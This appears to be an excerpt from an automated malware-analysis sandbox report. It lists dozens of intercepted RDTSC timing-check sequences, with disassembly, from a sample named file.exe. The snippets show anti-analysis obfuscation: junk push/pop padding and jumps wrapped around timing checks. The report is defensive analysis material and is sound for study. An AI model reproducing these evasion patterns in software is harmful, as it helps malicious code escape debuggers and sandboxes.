                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030367 second address: 503039E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C150211Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ebx, 464ECA50h 0x00000015 call 00007F05C1502129h 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503039E second address: 50303A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0007 second address: 4FE00C4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F05C150211Bh 0x00000008 add esi, 46EE2E2Eh 0x0000000e jmp 00007F05C1502129h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jmp 00007F05C1502120h 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d jmp 00007F05C1502120h 0x00000022 push eax 0x00000023 pushad 0x00000024 mov edx, 64AA4084h 0x00000029 mov ebx, 36CCE0F0h 0x0000002e popad 0x0000002f xchg eax, ebp 0x00000030 jmp 00007F05C150211Fh 0x00000035 mov ebp, esp 0x00000037 pushad 0x00000038 call 00007F05C1502124h 0x0000003d pushad 0x0000003e popad 0x0000003f pop eax 0x00000040 mov edi, 1E43BB14h 0x00000045 popad 0x00000046 and esp, FFFFFFF8h 0x00000049 jmp 00007F05C1502123h 0x0000004e xchg eax, ecx 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F05C1502125h 0x00000056 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE00C4 second address: 4FE00DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F05C12920BBh 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE00DC second address: 4FE016B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C1502129h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop esi 0x0000000e pop edx 0x0000000f mov ebx, esi 0x00000011 popad 0x00000012 xchg eax, ebx 0x00000013 jmp 00007F05C150211Eh 0x00000018 push eax 0x00000019 pushad 0x0000001a mov edi, 1C543C94h 0x0000001f mov dx, 8E00h 0x00000023 popad 0x00000024 xchg eax, ebx 0x00000025 pushad 0x00000026 mov ch, bl 0x00000028 pushfd 0x00000029 jmp 00007F05C150211Eh 0x0000002e and ecx, 4E64FC48h 0x00000034 jmp 00007F05C150211Bh 0x00000039 popfd 0x0000003a popad 0x0000003b mov ebx, dword ptr [ebp+10h] 0x0000003e jmp 00007F05C1502126h 0x00000043 xchg eax, esi 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F05C150211Ah 0x0000004d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE016B second address: 4FE0171 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0171 second address: 4FE0177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0177 second address: 4FE01A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F05C12920BEh 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE01A6 second address: 4FE01B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05C150211Eh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE01B8 second address: 4FE02A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F05C12920C4h 0x00000013 jmp 00007F05C12920C5h 0x00000018 popfd 0x00000019 mov bl, ah 0x0000001b popad 0x0000001c mov esi, dword ptr [ebp+08h] 0x0000001f pushad 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F05C12920BFh 0x00000027 sub cl, 0000006Eh 0x0000002a jmp 00007F05C12920C9h 0x0000002f popfd 0x00000030 mov edi, eax 0x00000032 popad 0x00000033 mov si, D793h 0x00000037 popad 0x00000038 xchg eax, edi 0x00000039 jmp 00007F05C12920C6h 0x0000003e push eax 0x0000003f pushad 0x00000040 pushad 0x00000041 mov dx, 8BE2h 0x00000045 mov bx, 842Eh 0x00000049 popad 0x0000004a pushfd 0x0000004b jmp 00007F05C12920BFh 0x00000050 or cx, 54DEh 0x00000055 jmp 00007F05C12920C9h 0x0000005a popfd 0x0000005b popad 0x0000005c xchg eax, edi 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F05C12920C8h 0x00000066 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE02A3 second address: 4FE02A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE02A7 second address: 4FE02AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE02AD second address: 4FE02F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F05C150211Ch 0x00000008 pop eax 0x00000009 call 00007F05C150211Bh 0x0000000e pop ecx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 test esi, esi 0x00000014 jmp 00007F05C150211Fh 0x00000019 je 00007F063345044Eh 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F05C1502120h 0x00000028 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE02F7 second address: 4FE02FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE02FD second address: 4FE0324 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C150211Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F05C150211Ah 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0324 second address: 4FE0328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0328 second address: 4FE032E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE032E second address: 4FE0361 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F06331E03A1h 0x0000000f jmp 00007F05C12920C0h 0x00000014 mov edx, dword ptr [esi+44h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov ecx, ebx 0x0000001c mov dh, FBh 0x0000001e popad 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0361 second address: 4FE03C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F05C1502121h 0x00000008 pop ecx 0x00000009 push edi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e or edx, dword ptr [ebp+0Ch] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F05C1502129h 0x00000018 sbb eax, 7270F606h 0x0000001e jmp 00007F05C1502121h 0x00000023 popfd 0x00000024 mov cx, 6DB7h 0x00000028 popad 0x00000029 test edx, 61000000h 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE03C2 second address: 4FE03C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE03C6 second address: 4FE03CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE03CA second address: 4FE03D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE03D0 second address: 4FE03D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE03D6 second address: 4FE03DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE03DA second address: 4FE0417 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C1502128h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F06334503A6h 0x00000011 jmp 00007F05C1502120h 0x00000016 test byte ptr [esi+48h], 00000001h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e pop edi 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0417 second address: 4FE041B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE041B second address: 4FE0478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F05C1502126h 0x0000000c sub ecx, 6E3D0C98h 0x00000012 jmp 00007F05C150211Bh 0x00000017 popfd 0x00000018 popad 0x00000019 jne 00007F063345036Ch 0x0000001f jmp 00007F05C1502126h 0x00000024 test bl, 00000007h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F05C150211Ah 0x00000030 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0478 second address: 4FE047E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD07E5 second address: 4FD07EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD07EB second address: 4FD07F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD07F1 second address: 4FD07F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD07F5 second address: 4FD0864 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F05C12920BEh 0x00000011 mov ebp, esp 0x00000013 jmp 00007F05C12920C0h 0x00000018 and esp, FFFFFFF8h 0x0000001b pushad 0x0000001c call 00007F05C12920BEh 0x00000021 mov edx, esi 0x00000023 pop eax 0x00000024 call 00007F05C12920C7h 0x00000029 mov ch, DBh 0x0000002b pop ebx 0x0000002c popad 0x0000002d xchg eax, ebx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0864 second address: 4FD086A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD086A second address: 4FD0870 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0870 second address: 4FD0874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0874 second address: 4FD0878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0878 second address: 4FD0887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0887 second address: 4FD088B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD088B second address: 4FD08A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C1502122h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD08A1 second address: 4FD08A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD08A7 second address: 4FD0919 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C150211Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F05C150211Eh 0x00000011 xchg eax, esi 0x00000012 jmp 00007F05C1502120h 0x00000017 push eax 0x00000018 jmp 00007F05C150211Bh 0x0000001d xchg eax, esi 0x0000001e jmp 00007F05C1502126h 0x00000023 mov esi, dword ptr [ebp+08h] 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F05C1502127h 0x0000002d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0919 second address: 4FD091F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD091F second address: 4FD0978 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C150211Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F05C1502120h 0x00000014 sbb ah, 00000068h 0x00000017 jmp 00007F05C150211Bh 0x0000001c popfd 0x0000001d popad 0x0000001e test esi, esi 0x00000020 jmp 00007F05C1502126h 0x00000025 je 00007F0633457B38h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0978 second address: 4FD097C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD097C second address: 4FD0982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0982 second address: 4FD0988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0988 second address: 4FD098C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD098C second address: 4FD09C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F05C12920BFh 0x00000017 call 00007F05C12920C8h 0x0000001c pop ecx 0x0000001d popad 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD09C7 second address: 4FD09CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD09CD second address: 4FD09D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD09D1 second address: 4FD0A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a pushad 0x0000000b mov eax, 23B3841Bh 0x00000010 mov bx, ax 0x00000013 popad 0x00000014 je 00007F0633457AD4h 0x0000001a jmp 00007F05C150211Ah 0x0000001f test byte ptr [76FB6968h], 00000002h 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F05C150211Eh 0x0000002d sub ax, 6418h 0x00000032 jmp 00007F05C150211Bh 0x00000037 popfd 0x00000038 popad 0x00000039 jne 00007F0633457AAEh 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F05C1502121h 0x00000046 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0A37 second address: 4FD0A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0A3D second address: 4FD0A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0A41 second address: 4FD0A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0A45 second address: 4FD0A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b jmp 00007F05C150211Fh 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F05C1502125h 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0A77 second address: 4FD0AA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 jmp 00007F05C12920C8h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F05C12920BEh 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0AA9 second address: 4FD0ABF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C150211Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0ABF second address: 4FD0AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0AC3 second address: 4FD0AC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0AC7 second address: 4FD0ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0ACD second address: 4FD0AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05C1502129h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0AEA second address: 4FD0B22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F05C12920BEh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F05C12920BDh 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0B22 second address: 4FD0B37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C1502121h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0B37 second address: 4FD0B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F05C12920BDh 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0B5C second address: 4FD0B6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05C150211Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0B6C second address: 4FD0B83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+14h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F05C12920BAh 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0BEB second address: 4FD0BFC instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b movzx eax, di 0x0000000e push edx 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0BFC second address: 4FD0C2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F05C12920C7h 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0C2D second address: 4FD0C33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0C33 second address: 4FD0C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0C37 second address: 4FD0C3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0C3B second address: 4FD0C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F05C12920BAh 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0E85 second address: 4FE0E89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0E89 second address: 4FE0E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0E8F second address: 4FE0EA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C150211Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0EA8 second address: 4FE0EC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0EC5 second address: 4FE0F47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F05C1502127h 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov esi, 77E24AC1h 0x00000015 jmp 00007F05C150211Eh 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d mov ecx, 2756346Dh 0x00000022 mov ecx, 47AEAA69h 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F05C1502122h 0x00000031 sbb ah, 00000038h 0x00000034 jmp 00007F05C150211Bh 0x00000039 popfd 0x0000003a call 00007F05C1502128h 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0F47 second address: 4FE0F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pop ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F05C12920BAh 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE0F5A second address: 4FE0F60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
